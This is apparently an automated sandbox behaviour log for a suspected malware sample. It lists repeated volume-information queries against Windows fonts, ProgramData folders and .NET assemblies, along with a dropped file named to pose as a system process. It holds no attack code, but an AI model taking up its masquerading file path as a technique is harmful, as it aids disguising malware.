Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\ProgramData\Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Microsoft Network\System.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Data VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Data VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Data VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Data VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Data VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Data VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Data VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Systemd VolumeInformation
Source: C:\ProgramData\Microsoft Network\System.exe	Queries volume information: C:\ProgramData\Data VolumeInformation

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Code function: 5_2_0042405D cpuid

5_2_0042405D

